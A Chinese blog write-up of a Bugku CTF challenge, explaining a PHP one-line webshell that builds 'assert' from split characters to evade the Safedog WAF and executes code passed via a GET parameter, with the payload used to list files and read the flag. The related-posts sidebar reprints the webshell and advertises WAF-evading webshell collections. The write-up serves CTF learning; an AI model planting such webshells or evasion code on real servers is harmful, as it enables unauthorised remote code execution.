bugku:过狗一句话

最新推荐文章于 2022-05-03 18:05:13 发布
最新推荐文章于 2022-05-03 18:05:13 发布
阅读量342 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wssmiss/article/details/89341577
版权

题目

在这里插入图片描述
php代码
在这里插入图片描述
explode(a,b,c):把字符串打散为数组,a为分隔符且不为空,b为待打散的字符,c规定所返回的数组元素的数目 0代表返回博阿寒一个元素的数组,大于0返回包含最多c个元素的数组。小于0,返回包含除最后的limit个元素意外的所有元素的数组

代码poc_1是一个数组有a,s,s,e,r,t五个元素
poc_2是assert函数 对传入的s进行操作

注:函数assert是检查一个断言是否为FALSE
assert 有代码执行漏洞
利用此漏洞构造s
s=print_r(scandir(’./’))
在这里插入图片描述
在这里插入图片描述
打开flag_aaa.txt
在这里插入图片描述
得到flag

wssmiss
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php一句大全,[各种一句木马大全]各种一句
weixin_39995351的博客
03-11 8513
PHP一句:1、普通一句2、防爆破一句 //菜刀地址http://192.168.64.137/x.php?x=mytest 密码:pass3、过狗一句 //菜刀地址 http://localhost/1.php?s=assert等价于$=@$GET['s'];@$($_POST['pass']);?>4、404隐藏一句preg_replace()方法中的e,只适用于php5及更早...
BugKu杂项QAQ反编译完整版
07-21
"BugKu杂项QAQ反编译完整版"是指针对BugKu平台上的一个MISC(Miscellaneous)类问题,该问题涉及到一个名为"QAQ"的挑战,可能是一个编程或解谜类型的题目。由于在线反编译工具可能无法提供完整的结果,这里提供了一...
过狗一句原理与利用
金色%夕阳的博客
05-03 1827
过狗一句原理与利用 在之前的文件上传漏洞中就有介绍过木马文件,通过上传木马文件实现远程连接从而进行远程控制操作。利用上传文件漏洞上传木马文件过程中,可能会遇到服务端对上传文件后缀、文件名、文件格式以及文件内容等进行检测过滤,从而导致木马文件上传失败。如今存在很多过滤机制与安全产品能够实现网站上传保护,比如安全狗。因此,学习如何绕过这些保护机制成功上传木马文件是至关重要的。在下面的学习中我们称之为过狗一句,该名称源于绕过安全狗的检测机制成功过上传一句木马文件。 在学习过狗一句之前,需要先学习一句木马
PHP一句后门过狗姿势万千之后门构造与隐藏
weixin_30454481的博客
02-03 447
第二章节主要带给大家一些后门构造思路,与安全狗文件特征检测的机制。 另外强调一下,这篇文章需要大家对于php有一定的认识。 本章节分为三大部分,第一部分针对初级,分析菜刀php代码的执行过程,较基础;第二部分主要总结一些可以利用的后门姿势,这部分我主要给大家分享一些搜集的后门,希望可以拓展大家的思路;第三部分主要分享后门隐藏之道。 声明:在后门举例中大部分后门构造与思路,可能网上都有类似的,...
各类一句木马免杀集合
joke_ljh的博客
10-10 2309
各类一句木马免杀集合,基本过D盾与安全狗,php、asp、aspx、jsp一句和冰蝎,我写的文章链接如下: https://www.cnblogs.com/joke-ljh/p/13794125.html
php 过狗一句木马的编写,过狗一句编写之代码执行漏洞函数代替eval
weixin_42514432的博客
04-12 887
1.说明tips : 补发一个之前写的过狗一句,当时有发在博客和t00ls,由于博客重建了,就从t00ls copy过来吧。2.起因及过狗原理今天下午看坛友发了一个求助贴,让帮忙分析一句木马呢!帖子二楼的大牛分析的很到位,那个一句木马用了函数回调的方法,传递一个存在代码执行漏洞的函数preg_replace来代替eval执行代码然后我就想着,安全狗查杀一句的时候,通常检测eval 和 $_...
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku杂项题writeup
11-22
bugku杂项题writeup
bugku《1和0的故事.txt》
07-24
大佬可以试试
2019最新过狗过,云锁,360等WAF的PHP免杀大马
02-02
2019最新过狗过,云锁,360等WAF的PHP免杀大马等主流防护软件
最新过安全狗一句
10-14
最新过安全狗一句
2015年最新的过狗一句大马
12-26
2015年最新的过狗一句大马
Bugku-CTF之过狗一句(送给大家一个过狗一句
weixin_34227447的博客
04-28 850
Day25 过狗一句 http://123.206.87.240:8010/ 送给大家一个过狗一句<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?...
bugku 过狗一句
weixin_30539835的博客
04-27 188
用php的系统函数,突破低权限。 题目来自于bugku的"过狗一句",这道题目有接近2100人做出来,可是网上的wp并没有给出确切的原理,所以在此借这一道题目,抛砖引入。 题目地址 一丶代码和分析 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); //explode()把"a#s#s#e#r#t"去掉变为a...
Bugku-CTF-shell-过狗一句
kaixinXQ的博客
08-08 398
送给大家一个过狗一句 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 点击题目: 读取PHP下面的文件: print_r(scandir($dir)),还可以利用print_r(glob("*.*")) 访问txt文件:http://114.67.246.176:16100/.
过狗一句 -Bugku
j7ur8
06-21 1115
搜索到的几种解法:    1. s=print_r(scandir('./')) 然后读取flag.txt    2. s=print_r(glob("*.*")) 然后读取show_source(flag.txt)    3. 使用flag_get_contents(flag.txt)读取文件    eg: 还有system('ls')的读取方法但是这里应该没有权限....
bugku过狗一句 writeup
perye
02-27 7804
过狗一句题目提示里的php代码拿下来&lt;?php $poc = "a#s#s#e#r#t"; $poc_1 = explode("#", $poc); $poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3] . $poc_1[4] . $poc_1[5]; $poc_2($_GET['s']) ?&gt;12345用assert执行任意代...
bugku——过狗一句(奇淫技巧)
地址ch3nye.top
08-29 9758
今天学校ctf战队给了个bugku的题不过改了一下,我觉得挺有意思的,做一下记录。 题目   &lt;?php $poc = "a#s#s#e#r#t"; $poc_1 = explode("#", $poc); $poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3] . $poc_1[4] . $poc_1[5]; $poc_2...
Bugku CTF挑战:图像隐藏与解码技巧
本资源是一份针对IT安全和编码挑战的杂项题目练习集,共包含五个题目,旨在帮助学习者提升技能和理解各种技术问题。以下是每个题目的详细介绍: 1. 杂项第三十四题:图穷匕见 - 题目涉及解密隐藏在图像中的信息。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值